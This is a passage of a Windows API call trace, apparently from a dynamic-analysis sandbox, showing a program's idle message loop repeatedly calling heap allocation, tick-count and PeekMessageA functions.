CoFreeUnusedLibraries () [0066.540] GetTickCount () returned 0x1d299 [0066.541] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.541] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.541] GetTickCount () returned 0x1d299 [0066.541] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.541] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.541] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.541] GetTickCount () returned 0x1d299 [0066.541] GetTickCount () returned 0x1d299 [0066.541] CoFreeUnusedLibraries () [0066.541] GetTickCount () returned 0x1d299 [0066.541] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.541] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.541] GetTickCount () returned 0x1d299 [0066.541] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.541] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.541] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.541] GetTickCount () returned 0x1d299 [0066.541] GetTickCount () returned 0x1d299 [0066.541] CoFreeUnusedLibraries () [0066.541] GetTickCount () returned 0x1d299 [0066.541] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.541] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.541] GetTickCount () returned 0x1d299 [0066.541] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.541] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.541] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.541] GetTickCount () returned 0x1d299 [0066.542] GetTickCount () returned 0x1d299 [0066.542] CoFreeUnusedLibraries () [0066.542] GetTickCount () returned 0x1d299 [0066.542] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.542] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.542] GetTickCount () returned 0x1d299 [0066.542] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.542] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.542] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.542] GetTickCount () returned 0x1d299 [0066.542] GetTickCount () returned 0x1d299 [0066.542] CoFreeUnusedLibraries () [0066.542] GetTickCount () returned 0x1d299 [0066.542] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.542] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.542] GetTickCount () returned 0x1d299 [0066.542] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.542] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.542] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.542] GetTickCount () returned 0x1d299 [0066.542] GetTickCount () returned 0x1d299 [0066.542] CoFreeUnusedLibraries () [0066.542] GetTickCount () returned 0x1d299 [0066.542] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.542] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.542] GetTickCount () returned 0x1d299 [0066.542] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.543] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.543] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.543] GetTickCount () returned 0x1d299 [0066.543] GetTickCount () returned 0x1d299 [0066.543] CoFreeUnusedLibraries () [0066.543] GetTickCount () returned 0x1d299 [0066.543] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.543] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.543] GetTickCount () returned 0x1d299 [0066.543] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.543] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.543] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.543] GetTickCount () returned 0x1d299 [0066.543] GetTickCount () returned 0x1d299 [0066.543] CoFreeUnusedLibraries () [0066.543] GetTickCount () returned 0x1d299 [0066.543] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.543] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.543] GetTickCount () returned 0x1d299 [0066.543] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.543] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.543] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.543] GetTickCount () returned 0x1d299 [0066.543] GetTickCount () returned 0x1d299 [0066.543] CoFreeUnusedLibraries () [0066.543] GetTickCount () returned 0x1d299 [0066.543] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.543] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.544] GetTickCount () returned 0x1d299 [0066.544] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.544] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.544] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.544] GetTickCount () returned 0x1d299 [0066.544] GetTickCount () returned 0x1d299 [0066.544] CoFreeUnusedLibraries () [0066.544] GetTickCount () returned 0x1d299 [0066.544] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.544] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.544] GetTickCount () returned 0x1d299 [0066.544] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.544] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.544] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.544] GetTickCount () returned 0x1d299 [0066.544] GetTickCount () returned 0x1d299 [0066.544] CoFreeUnusedLibraries () [0066.544] GetTickCount () returned 0x1d299 [0066.544] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.544] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.544] GetTickCount () returned 0x1d299 [0066.544] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.544] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.544] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.544] GetTickCount () returned 0x1d299 [0066.544] GetTickCount () returned 0x1d299 [0066.545] CoFreeUnusedLibraries () [0066.545] GetTickCount () returned 0x1d299 [0066.545] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.545] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.545] GetTickCount () returned 0x1d299 [0066.545] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.545] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.545] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.545] GetTickCount () returned 0x1d299 [0066.545] GetTickCount () returned 0x1d299 [0066.545] CoFreeUnusedLibraries () [0066.545] GetTickCount () returned 0x1d299 [0066.545] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.545] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.545] GetTickCount () returned 0x1d299 [0066.545] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.545] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.545] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.545] GetTickCount () returned 0x1d299 [0066.545] GetTickCount () returned 0x1d299 [0066.545] CoFreeUnusedLibraries () [0066.545] GetTickCount () returned 0x1d299 [0066.545] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.545] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.545] GetTickCount () returned 0x1d299 [0066.545] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.545] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.546] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.546] GetTickCount () returned 0x1d299 [0066.546] GetTickCount () returned 0x1d299 [0066.546] CoFreeUnusedLibraries () [0066.546] GetTickCount () returned 0x1d299 [0066.546] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.546] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.546] GetTickCount () returned 0x1d299 [0066.546] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.546] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.546] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.546] GetTickCount () returned 0x1d299 [0066.546] GetTickCount () returned 0x1d299 [0066.546] CoFreeUnusedLibraries () [0066.546] GetTickCount () returned 0x1d299 [0066.546] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.546] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.546] GetTickCount () returned 0x1d299 [0066.546] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.546] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.546] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.546] GetTickCount () returned 0x1d299 [0066.546] GetTickCount () returned 0x1d299 [0066.546] CoFreeUnusedLibraries () [0066.546] GetTickCount () returned 0x1d299 [0066.546] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.546] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.546] GetTickCount () returned 0x1d299 [0066.547] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.547] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.547] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] CoFreeUnusedLibraries () [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.547] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.547] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.547] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] CoFreeUnusedLibraries () [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.547] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.547] GetTickCount () returned 0x1d2a9 [0066.547] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.547] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.548] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] CoFreeUnusedLibraries () [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.548] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.548] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.548] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] CoFreeUnusedLibraries () [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.548] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.548] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.548] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.548] GetTickCount () returned 0x1d2a9 [0066.548] GetTickCount () returned 0x1d2a9 [0066.549] CoFreeUnusedLibraries () [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.549] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.549] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.549] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] CoFreeUnusedLibraries () [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.549] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.549] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.549] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] GetTickCount () returned 0x1d2a9 [0066.549] CoFreeUnusedLibraries () [0066.549] GetTickCount () returned 0x1d2a9 [0066.550] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.550] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.550] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.550] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] CoFreeUnusedLibraries () [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.550] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.550] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.550] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] CoFreeUnusedLibraries () [0066.550] GetTickCount () returned 0x1d2a9 [0066.550] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.551] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.551] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.551] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] CoFreeUnusedLibraries () [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.551] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.551] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.551] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] CoFreeUnusedLibraries () [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.551] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.551] GetTickCount () returned 0x1d2a9 [0066.551] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.551] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.552] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] CoFreeUnusedLibraries () [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.552] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.552] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.552] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] CoFreeUnusedLibraries () [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.552] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.552] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.552] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] CoFreeUnusedLibraries () [0066.552] GetTickCount () returned 0x1d2a9 [0066.552] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.552] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.552] GetTickCount () returned 0x1d2a9 [0066.553] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.553] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.553] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] CoFreeUnusedLibraries () [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.553] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.553] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.553] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] CoFreeUnusedLibraries () [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.553] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.553] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.553] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] CoFreeUnusedLibraries () [0066.553] GetTickCount () returned 0x1d2a9 [0066.553] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.553] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 